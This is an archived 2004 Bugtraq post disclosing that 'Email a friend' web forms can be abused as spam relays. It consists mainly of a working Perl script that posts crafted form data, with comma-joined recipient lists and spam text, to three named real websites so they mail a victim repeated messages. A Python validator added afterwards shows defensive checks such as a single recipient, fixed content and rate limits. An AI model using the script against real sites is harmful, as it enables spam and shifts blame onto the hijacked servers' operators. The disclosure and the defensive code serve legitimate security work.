Spammers can hide behind 'Email a friend/article' scripts.

cyber_flash_at_hotmail.com
Date: 04/26/04

  • Next message: Imperva Application Defense Center: "RE: New Paper - SQL Injection Signatures Evasion"
    Date: 26 Apr 2004 20:26:13 -0000
    To: bugtraq@securityfocus.com
    
    

    # Author: Vengy
    # Email: cyber_flash@hotmail.com
    # Description: Spammers can hide behind 'Email a friend/article' scripts.
    #
    #
    # How it works:
    # -------------
    # This simple perl script will send just 3 identical fake spam messages
    # to 'yourname@yourdomain.com' from 'vengy@spam4u.com'. Example:
    #
    # +------------------------------------------+
    # | From    : <vengy@spam4u.com>             |
    # | Sent    : Friday, April 9, 2004 6:34 PM  |
    # | To      : <yourname@yourdomain.com>      |
    # | Subject : To spam or not to spam!        |
    # |                                          |
    # | Urgent! Call me: 1-900-EAT-SPAM          |
    # |                                          |
    # | www.spammmmmm.com                        |
    # +------------------------------------------+
    #
    # If a spammer or victim sends junk email directly to their ISP SMTP servers,
    # network Admins can trace back the connection and deal with the problem.
    #
    # But, the 'Email a friend' technique will deflect a significant portion of
    # the complaints away from spammers and towards the administrators of the hijacked host.
    #
    # There are possibly zillions of insecure 'Email a friend/article' scripts on the web! (just google it)
    # Many allow multiple unrestricted emails to be sent, separated by commas.
    # (Imagine an automated harvester to compile a list of open spam servers!)
    #
    # For demonstrational purposes, here are two random servers:
    #
    #
    # Host:                       Outgoing SMTP Server:   Email Originator:
    # =====                       =====================   =================
    # www.wcqp.com                relay.westlaw.com       eg-fsite-b12.ecom.tlrg.com
    # edinburghnews.scotsman.com  macdui.scotsman.com     80-75-65-10.eqsn.net
    #
    #
    # Notes: Relaying is denied (550) when connecting directly to the SMTP servers.
    # However, by using email forms, the Originator has access to send messages!
    #
    #
    # Arguments to Send_SPAM are:
    # ---------------------------
    # 1. Webserver.
    # 2. Email script.
    # 3. Host.
    # 4. Content.
    # 5. Email address of Victim.
    # 6. Number of copies to send.

    use IO::Socket::INET qw(CRLF);

    my $victim = 'yourname@yourdomain.com';
    my $copies = 3;
    my $sender_email = 'vengy@spam4u.com';
    my $sender_name = 'vengy';
    my $subject = 'To+spam+or+not+to+spam%21';
    my $body = 'Urgent!+Call+me:+1-900-EAT-SPAM';
    my $spam_url = 'http%3A%2F%2Fwww.spammmmmm.com';

    ################## Spam Server #1 ##################
    Send_SPAM('www.wcqp.com',
              'FSL5CS/Custom/emailPageConfirm.asp',
              'www.wcqp.com',
              'friend_name='.("%2C" x ($copies-1)).'&friend_email='.$victim.'&your_name='.$sender_name.'&your_email='.$sender_email.'&subject='.$subject.'&comments='.$body.'&url='.$spam_url,
               $victim,
               $copies);
              
    ################## Spam Server #2 ##################
    Send_SPAM('216.55.105.36.hera.net',
              'recommend.php/en/',
              'toolbox.academicpriority.co.il',
              'recommend='.$spam_url.'&friendsemail='.$victim.'&youremail='.$sender_email.'&yourname='.$sender_name,
              $victim,
              1);

    ################## Spam Server #3 ##################
    Send_SPAM('www.scotsman.com',
              'email2.cfm',
              'edinburghnews.scotsman.com',
              'id=364942004&referringtemplate='.$spam_url.'&referringquerystring=id%3D&recipientemail='.$victim.'&sendername='.$sender_name.'&senderemail='.$sender_email.'&subject='.$subject.'&message='.$body,
              $victim,
              $copies);
              

    sub Send_SPAM {
        my ($server,$url,$host,$content,$email_to,$email_num) = @_;
          
        $repeat_email_to = ($email_to."%2C") x $email_num;
        substr($repeat_email_to,-3,3) = "";
        $content =~ s/$email_to/$repeat_email_to/;
        
        $sock = IO::Socket::INET->new(PeerAddr => $server ,PeerPort => 'http(80)',Proto => 'tcp');
        die "$!" unless $sock;
        $sock->autoflush();
        
        print $sock 'POST /'.$url.' HTTP/1.1',CRLF,
                    'Host: '.$host,CRLF,
                    'Content-Type: application/x-www-form-urlencoded',CRLF,
                    'Content-Length: '.length($content),CRLF,
                    'Connection: Keep-Alive',CRLF,
                    'Cache-Control: no-cache',CRLF x 2,
                    $content;
                    
        close $sock;
        
        print "Sent SPAM from server: $server\n";
    }
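
Added example, not part of the original post or any of the sites it names: a server-side check for an 'Email a friend' form that closes the gaps the script relies on (comma-separated recipient lists, a visitor-chosen sender, free-text subject and body, an arbitrary link, unlimited submissions). The field names follow the first form in the post; the site host, sender address, hourly limit and function name are assumptions.

```python
import re
import time
from urllib.parse import parse_qs, urlsplit

# Assumed site settings (placeholders, not taken from the post).
SITE_HOST = "news.example.org"
SITE_FROM = "noreply@news.example.org"
MAX_PER_HOUR = 5
ADDR = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
_sent = {}  # client IP -> timestamps of accepted sends


def check_submission(body, client_ip, now=None):
    """Validate one urlencoded POST body; return (True, message) or (False, reason)."""
    now = time.time() if now is None else now
    # parse_qs decodes %2C, %0D and %0A, so the checks below see the real characters.
    form = parse_qs(body, keep_blank_values=True)
    if any(len(values) != 1 for values in form.values()):
        return False, "repeated field"
    f = {key: values[0] for key, values in form.items()}

    to = f.get("friend_email", "")
    if not ADDR.fullmatch(to):  # commas, spaces and CR/LF all fail the match
        return False, "recipient must be a single address"

    name = f.get("your_name", "")
    if not name or len(name) > 60 or re.search(r"[\x00-\x1f,<>@]", name):
        return False, "bad sender name"

    try:
        link = urlsplit(f.get("url", ""))
        host = link.hostname
    except ValueError:
        return False, "bad link"
    if link.scheme not in ("http", "https") or host != SITE_HOST:
        return False, "link must point at this site"

    recent = [t for t in _sent.get(client_ip, []) if now - t < 3600]
    if len(recent) >= MAX_PER_HOUR:
        return False, "rate limit exceeded"
    _sent[client_ip] = recent + [now]

    # The server writes sender, subject and text itself. The visitor's claimed
    # address (your_email), subject and comments never reach the message.
    return True, {
        "from": SITE_FROM,
        "to": to,
        "subject": "A page from " + SITE_HOST,
        "body": name + " asked us to send you this link: " + link.geturl(),
    }
```

The in-memory counter stands in for whatever shared store a real deployment would use; a per-IP limit alone does not stop a distributed sender, so it complements the single-recipient and fixed-content checks rather than replacing them.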

